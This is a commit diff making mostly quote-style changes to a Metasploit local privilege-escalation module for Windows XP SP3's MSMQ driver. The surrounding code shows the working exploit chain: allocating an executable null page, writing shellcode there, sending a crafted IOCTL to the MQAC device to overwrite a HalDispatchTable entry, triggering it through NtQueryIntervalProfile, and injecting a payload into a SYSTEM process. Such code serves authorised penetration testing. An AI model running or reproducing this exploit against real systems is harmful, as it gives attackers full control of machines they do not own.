Minor tidies to conform to standards

Author: OJ

modules/exploits/windows/local/mqac_write.rb

@@ -61,10 +61,10 @@ def initialize(info={})
 
   def find_sys_base(drvname)
     session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
-    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
+    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
+    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
@@ -82,24 +82,24 @@ def find_sys_base(drvname)
   # Function borrowed from smart_hashdump
   def get_system_proc
     # Make sure you got the correct SYSTEM Account Name no matter the OS Language
-    local_sys = resolve_sid("S-1-5-18")
+    local_sys = resolve_sid('S-1-5-18')
     system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
 
     this_pid = session.sys.process.getpid
     # Processes that can Blue Screen a host if migrated in to
-    dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
+    dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']
     session.sys.process.processes.each do |p|
       # Check we are not migrating to a process that can BSOD the host
-      next if dangerous_processes.include?(p["name"])
-      next if p["pid"] == this_pid
-      next if p["pid"] == 4
-      next if p["user"] != system_account_name
+      next if dangerous_processes.include?(p['name'])
+      next if p['pid'] == this_pid
+      next if p['pid'] == 4
+      next if p['user'] != system_account_name
       return p
     end
   end
 
   def open_device
-    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
+    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
     if handle['return'] == 0
       print_error('Failed to open the \\\\.\\MQAC device')
       return nil
@@ -110,34 +110,34 @@ def open_device
   def check
     handle = open_device
     if handle.nil? || handle == INVALID_HANDLE_VALUE
-      print_error("MSMQ installation not found")
+      print_error('MSMQ installation not found')
       return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
 
-    os = sysinfo["OS"]
+    os = sysinfo['OS']
     case os
     when /windows xp.*service pack 3/i
       return Exploit::CheckCode::Appears
     when /windows xp/i
-      print_error("Incorrect version of Windows XP detected")
+      print_error('Unsupported version of Windows XP detected')
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
     end
   end
 
   def exploit
-    if sysinfo["Architecture"] =~ /wow64/i
-      print_error("Running against WOW64 is not supported")
+    if sysinfo['Architecture'] =~ /wow64/i
+      print_error('Running against WOW64 is not supported')
       return
-    elsif sysinfo["Architecture"] =~ /x64/
-      print_error("Running against 64-bit systems is not supported")
+    elsif sysinfo['Architecture'] =~ /x64/
+      print_error('Running against 64-bit systems is not supported')
       return
     end
 
     if is_system?
-      print_error("This meterpreter session is already running as SYSTEM")
+      print_error('This meterpreter session is already running as SYSTEM')
       return
     end
 
@@ -154,7 +154,7 @@ def exploit
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
-      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
     end
     unless this_proc.memory.writable?(base_addr)
       print_error('Failed to properly allocate memory')
@@ -164,7 +164,7 @@ def exploit
 
     hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
     hKernel = hKernel['return']
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
+    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
     halDispatchTable = halDispatchTable['return']
     halDispatchTable -= hKernel
     halDispatchTable += kernel_info[0]
@@ -192,19 +192,19 @@ def exploit
     this_proc.memory.write(0x1, shellcode)
     this_proc.close
 
-    print_status("Triggering vulnerable IOCTL")
+    print_status('Triggering vulnerable IOCTL')
     session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
     result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
     unless is_system?
-      print_error("Exploit failed")
+      print_error('Exploit failed')
       return
     end
 
     proc = get_system_proc
     print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
     unless execute_shellcode(payload.encoded, nil, proc['pid'])
-      fail_with(Failure::Unknown, "Error while executing the payload")
+      fail_with(Failure::Unknown, 'Error while executing the payload')
     end
   end